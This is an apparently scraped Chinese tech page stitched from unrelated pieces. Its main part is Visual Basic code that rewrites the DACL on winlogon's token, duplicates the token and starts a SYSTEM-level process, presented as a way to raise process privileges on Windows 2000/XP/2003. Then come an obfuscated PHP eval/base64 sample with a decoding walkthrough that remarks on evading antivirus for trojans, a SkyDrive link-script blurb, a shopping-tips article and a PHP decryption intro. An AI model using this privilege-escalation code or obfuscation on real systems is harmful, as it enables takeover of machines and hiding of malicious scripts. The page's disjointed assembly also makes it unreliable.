用VB给进程提权!

核心代码:
仅支持2000,XP,2003系统

' CreateSystemProcess
' Purpose: start szProcessName under a duplicate of the token of the process whose
' PID GetSystemProcessID returns (the original comments call it winlogon). The
' token's DACL is first rewritten so that "Everyone" holds TOKEN_ALL_ACCESS, the
' token is then reopened with full access, duplicated as a primary token,
' impersonated, and finally handed to CreateProcessAsUser.
' Parameter: szProcessName - passed as the lpCommandLine argument of CreateProcessAsUser.
' Returns: True only if CreateProcessAsUser succeeded; False on any earlier failure.
' Preconditions: EnablePrivilege and GetSystemProcessID are defined elsewhere in
' the project; the original comment describes EnablePrivilege as enabling the
' Debug privilege. The page header states support for Windows 2000/XP/2003 only.
' Defender note: the observable footprint of this routine is OpenProcess on the
' winlogon PID -> OpenProcessToken -> SetKernelObjectSecurity on the token object
' -> DuplicateTokenEx -> ImpersonateLoggedOnUser -> CreateProcessAsUser. A DACL
' change on a token and a process created via CreateProcessAsUser from an
' interactive, non-service process are the events worth alerting on.
' NOTE(review): several locals below are declared but never used (pOrigSd, pNewSd,
' pOldDAcl, pNewDAcl, pSacl, hea, hToken1, pSidOwner, pSidPrimary, ct, hSacl1,
' hSidOwner1, hSidPrimary1).
Public Function CreateSystemProcess(ByVal szProcessName As String) As Boolean
    Dim hProcess As Long, dwPid As Long, hToken As Long, hNewToken As Long, pOrigSd As SECURITY_DESCRIPTOR, pNewSd As SECURITY_DESCRIPTOR, dwSDLen As Long, bDAcl As Long, pOldDAcl As ACL, bDefDAcl As Long
    Dim dwRet As Long, pNewDAcl As ACL, pSacl As ACL, dwSidOwnLen As Long, dwSidPrimLen As Long, si As STARTUPINFO, pi As PROCESS_INFORMATION, bError As Boolean
    Dim ea As EXPLICIT_ACCESS, hOrigSd As Long, hOldDAcl As Long, hNewDAcl As Long, dwAclSize As Long, dwSaclSize As Long
    Dim hSacl As Long, hSidOwner As Long, hSidPrimary As Long, hNewSd As Long, lngErr As Long
    Dim hea As Long, hToken1 As Long, pSidOwner As SID, pSidPrimary As SID, ct As SECURITY_DESCRIPTOR
    Dim hSacl1 As Long, hSidOwner1 As Long, hSidPrimary1 As Long
    ' Raise this process's privilege to Debug privilege (EnablePrivilege is defined elsewhere)
    If Not EnablePrivilege Then
        bError = True
        GoTo Cleanup
    End If
    ' Get winlogon's process ID (GetSystemProcessID is defined elsewhere); 0 means not found
    dwPid = GetSystemProcessID
    If dwPid = 0 Then
        bError = True
        GoTo Cleanup
    End If
    ' Get a process handle; only query access is requested here
    hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, False, dwPid)
    If hProcess = 0 Then
        bError = True
        GoTo Cleanup
    End If
    ' Get hToken with just enough access to read and rewrite the token's DACL
    If OpenProcessToken(hProcess, READ_CONTROL Or WRITE_DAC, hToken) = 0 Then
        bError = True
        GoTo Cleanup
    End If
    ' Build an ACE granting "Everyone" TOKEN_ALL_ACCESS
    BuildExplicitAccessWithName ea, "Everyone", TOKEN_ALL_ACCESS, GRANT_ACCESS, 0
    Debug.Print ea.grfAccessMode
    ' The first call is expected to fail; it only exists to obtain the required buffer length in dwSDLen
    If GetKernelObjectSecurity(ByVal hToken, DACL_SECURITY_INFORMATION, ByVal hOrigSd, ByVal 0, dwSDLen) = 0 Then
        lngErr = GetLastError()
        Debug.Print "GetLastError: " & lngErr
        Debug.Print "dwSDLen值为: " & dwSDLen
        ' NOTE(review): the ERROR_INSUFFICIENT_BUFFER check is commented out, so HeapAlloc runs
        ' on any failure with whatever dwSDLen currently holds (possibly 0).
'        If lngErr = ERROR_INSUFFICIENT_BUFFER Then
            hOrigSd = HeapAlloc(GetProcessHeap, HEAP_ZERO_MEMORY, dwSDLen)
            ' Second call fills the self-relative security descriptor at hOrigSd
            If GetKernelObjectSecurity(ByVal hToken, DACL_SECURITY_INFORMATION, ByVal hOrigSd, ByVal dwSDLen, dwSDLen) = 0 Then
                bError = True
                GoTo Cleanup
            End If
'        Else
'            bError = True
'            GoTo Cleanup
'        End If
    Else
        bError = True
        GoTo Cleanup
    End If
    ' Extract the DACL (hOldDAcl) of the original security descriptor
    If GetSecurityDescriptorDacl(ByVal hOrigSd, bDAcl, hOldDAcl, bDefDAcl) = 0 Then
        bError = True
        GoTo Cleanup
    End If

    ' Merge the new ACE into the old DACL, producing hNewDAcl
    ' NOTE(review): SetEntriesInAcl allocates hNewDAcl with LocalAlloc; Cleanup never
    ' LocalFree's it, so the ACL leaks on every call.
    dwRet = SetEntriesInAcl(ByVal 1, ea, hOldDAcl, hNewDAcl)
    If dwRet <> ERROR_SUCCESS Then
        hNewDAcl = 0
        bError = True
        GoTo Cleanup
    End If
    ' The first call with zero-sized buffers is expected to fail; it returns the size needed for each
    ' component of the absolute security descriptor hNewSd
    If MakeAbsoluteSD(ByVal hOrigSd, ByVal hNewSd, dwSDLen, ByVal hOldDAcl, dwAclSize, ByVal hSacl, dwSaclSize, ByVal hSidOwner, dwSidOwnLen, ByVal hSidPrimary, dwSidPrimLen) = 0 Then
        lngErr = GetLastError()
        Debug.Print "GetLastError: " & lngErr
        Debug.Print "hNewSd: " & hNewSd
        Debug.Print "hNewDAcl: " & hNewDAcl
        ' NOTE(review): as above, the error-code check is commented out, so the allocations below
        ' happen on any failure, not only ERROR_INSUFFICIENT_BUFFER.
        'If lngErr = ERROR_INSUFFICIENT_BUFFER Then
            hOldDAcl = HeapAlloc(GetProcessHeap, HEAP_ZERO_MEMORY, ByVal dwAclSize)
            hSacl = HeapAlloc(GetProcessHeap, HEAP_ZERO_MEMORY, ByVal dwSaclSize)
            hSidOwner = HeapAlloc(GetProcessHeap, HEAP_ZERO_MEMORY, ByVal dwSidOwnLen)
            hSidPrimary = HeapAlloc(GetProcessHeap, HEAP_ZERO_MEMORY, ByVal dwSidPrimLen)
            hNewSd = HeapAlloc(GetProcessHeap, HEAP_ZERO_MEMORY, ByVal dwSDLen)
            Debug.Print "调用MakeAbsoluteSD成功之后dwSDLen值为: " & dwSDLen
            ' Second call builds the absolute security descriptor hNewSd; it still carries the original DACL at this point
            If MakeAbsoluteSD(ByVal hOrigSd, ByVal hNewSd, dwSDLen, ByVal hOldDAcl, dwAclSize, ByVal hSacl, dwSaclSize, ByVal hSidOwner, dwSidOwnLen, ByVal hSidPrimary, dwSidPrimLen) = 0 Then
                bError = True
                GoTo Cleanup
            End If
            Debug.Print "hNewSd: " & hNewSd
            Debug.Print "hNewDAcl: " & hNewDAcl
'        Else
'            bError = True
'            GoTo Cleanup
'        End If
    End If

    ' Attach the all-access DACL hNewDAcl to the new security descriptor hNewSd
    If SetSecurityDescriptorDacl(hNewSd, bDAcl, hNewDAcl, bDefDAcl) = 0 Then
        bError = True
        GoTo Cleanup
    End If

    ' Write the new security descriptor back onto the token object
    If SetKernelObjectSecurity(hToken, DACL_SECURITY_INFORMATION, ByVal hNewSd) = 0 Then
        bError = True
        GoTo Cleanup
    End If
    ' Reopen the winlogon token with TOKEN_ALL_ACCESS in preparation for duplicating it
    ' NOTE(review): hToken is overwritten here; the handle opened earlier with READ_CONTROL Or WRITE_DAC
    ' is never closed, so it leaks.
    If OpenProcessToken(ByVal hProcess, TOKEN_ALL_ACCESS, hToken) = 0 Then
        bError = True
        GoTo Cleanup
    End If

    ' Duplicate the token as a primary token with the same access rights
    If DuplicateTokenEx(hToken, TOKEN_ALL_ACCESS, ByVal 0, ByVal SecurityImpersonation, ByVal TokenPrimary, hNewToken) = 0 Then
        bError = True
        GoTo Cleanup
    End If
    ' Without impersonating the logged-on user, creating the process fails with error 1314
    ' ("a required privilege is not held by the client").
    ' NOTE(review): the return value of ImpersonateLoggedOnUser is not checked.
    Call ImpersonateLoggedOnUser(hNewToken)
    ' Create the process using the all-access token
    If CreateProcessAsUser(hNewToken, vbNullString, szProcessName, ByVal 0&, ByVal 0, False, ByVal 0&, vbNullString, vbNullString, si, pi) = 0 Then
        bError = True
        GoTo Cleanup
    End If
    bError = False
Cleanup:
    ' Free every heap buffer that was allocated and close every handle. Handles that were never
    ' opened are still passed to CloseHandle (value 0); that call simply fails and is ignored.
'    On Error Resume Next
    If hOrigSd Then HeapFree GetProcessHeap, 0, hOrigSd
    If hNewSd Then HeapFree GetProcessHeap, 0, hNewSd
    If hSidPrimary Then HeapFree GetProcessHeap, 0, hSidPrimary
    If hSidOwner Then HeapFree GetProcessHeap, 0, hSidOwner
    If hSacl Then Call HeapFree(GetProcessHeap, 0, hSacl)
    If hOldDAcl Then Call HeapFree(GetProcessHeap, 0, hOldDAcl)
    Call CloseHandle(pi.hProcess)
    Call CloseHandle(pi.hThread)
    Call CloseHandle(hToken)
    Call CloseHandle(hNewToken)
    Call CloseHandle(hProcess)
    ' Return value mirrors bError: True only when CreateProcessAsUser succeeded
    If (bError) Then
        CreateSystemProcess = False
    Else
        CreateSystemProcess = True
    End If
End Function

下面是工程


PHP eval base64 混淆解密

密文类似这样:

<?php $OOO0O0O00=__FILE__;$OOO000000=urldecode('%74%68%36%73%62%65%68%71%6c%61%34%63 %6f%5f%73%61%64%66%70%6e%72');$OO00O0000=26408;$OOO0000O0=$OOO000000{4}.$OOO00 0000{9}.$OOO000000{3}.$OOO000000{5};$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$ OOO000000{13}.$OOO000000{16};$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO0000 00{12}.$OOO0000O0{7}.$OOO000000{5};$O0O0000O0='OOO0000O0';eval(($$O0O0000O0('J E9PME9PMDAwMD0kT09PMDAwMDAwezE3fS4kT09PMDAwMDAwezEyfS4kT09PMDAwMDAwezE4fS4kT09 PMDAwMDAwezV9LiRPT08wMDAwMDB7MTl9O2lmKCEwKSRPMDAwTzBPMDA9JE9PME9PMDAwMCgkT09PM E8wTzAwLCdyYicpOyRPTzBPTzAwME89JE9PTzAwMDAwMHsxN30uJE9PTzAwMDAwMHsyMH0uJE9PTzA wMDAwMHs1fS4kT09PMDAwMDAwezl9LiRPT08wMDAwMDB7MTZ9OyRPTzBPTzAwTzA9JE9PTzAwMDAwM HsxNH0uJE9PTzAwMDAwMHswfS4kT09PMDAwMDAwezIwfS4kT09PMDAwMDAwezB9LiRPT08wMDAwMDB 7MjB9OyRPTzBPTzAwME8oJE8wMDBPME8wMCwxMTgyKTskT08wME8wME8wPSgkT09PMDAwME8wKCRPT zBPTzAwTzAoJE9PME9PMDAwTygkTzAwME8wTzAwLDkwOCksJ0kvTU5LQUNkVlJHUXlEV1VncTY4d3B rYXpMTzVsdG5tVEIrMGJ2OXVIcnhGN1hTWTFFM2ZaaGlqYzRlMm9Kc1A9JywnQUJDREVGR0hJSktMT U5PUFFSU1RVVldYWVphYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5ejAxMjM0NTY3ODkrLycpKSk7ZXZ hbCgkT08wME8wME8wKTs=')));return;?> tiBr5CwHGMBrljDvtMTb6AqwwAJ8qpRkqpRmpbA6wh7uwZp6pbp6aZ4/8wwua6brR+zHVkp3LktrGMl HGMcxaMcrUiqHzkvSzk4lQ9DY56voGMBlQ+rlaMcrUiBFyuDH5jplQ9DY56voGMBlQ+rlaMcrUiEYzi A7OCJftMbuQMqVpAqgahDAwvLAwvJkgpR8k3t8qpRkqpRm8bADq6ttG6brmd1HGCvflipZGMqmwZp6p bp6k3tVpAqgaZBUwhgua6brR+zHVkp3LktrGMlHGMcxaMcrUiqHzkvSzk4lQ9DY56voGMBlQ+r ....

分析: 1. 首先看到文件被分为两个部分: 一部分被<?php ?>标签包围,这里应该是可执行代码;紧接着是一串类似Base64的文本,但用base64_decode()无法解出内容。 2. 发现可执行代码部分使用了eval()函数,将eval修改成echo后,把输出结果替换到原来eval的位置,结果如下:


SkyDrive 外链获取脚本

直接右键 添加到收藏夹

PS:为了防止资源浪费,本链接能用在我的网盘里,如需了解原理,请自行分析源码.
PS2:我用了301重定向+正则表达式

破解奸商绝招20条锦囊秘籍首度公开

“道高一尺魔高一丈,买的没有卖的精”等俗语都是在宣扬奸商的强势以及消费者的弱势。在笔者走访市场调查行情时也会经常遇到“小白”消费者在奸商的淫威下被糊弄的一塌糊涂,所以笔者经过长达两个月的收集总结将网友、同事等诸多长年在卖场中打拼的经验汇集成此语录,帮助消费者走出奸商的圈套。让消费者可以在卖场做到舌战群雄的境界。进而让消费者远离被骗的弱势局面,也可以帮助朋友在市场购买IT产品时锄强扶弱。

注:本文图片部分出自影视剧与网络,纯属娱乐。

破解奸商绝招 20条锦囊秘籍首度公开

不要事后再后悔

本文语录基本用的都是键鼠为主的奸商常用语句,不过其通用性高达99%。熟读此文可以尽可能的避免被忽悠的可能性,绝对是家居旅行、市场选购的必备宝典。

下面精彩即将开始……


PHP使用N层eval加密源码

PHP使用eval(gzinflate(str_rot13(base64_decode('BASE64加密后内容'))))核心代码的解密。以下讨论非扩展方式的PHP加密方法: 这里有个在线的,还不错。木马防杀还行,要保护代码可就不行了。对应地写了一个简单的解密程序,专门针对eval。这个原理很有用途。特别说明:此解密程序好像一定得在PHP5上面使用,我在PHP4上面测试eval(gzinflate(str_rot13(base64_decode('BASE64加密后内容'))))内加密的代码始终无法正常解密。
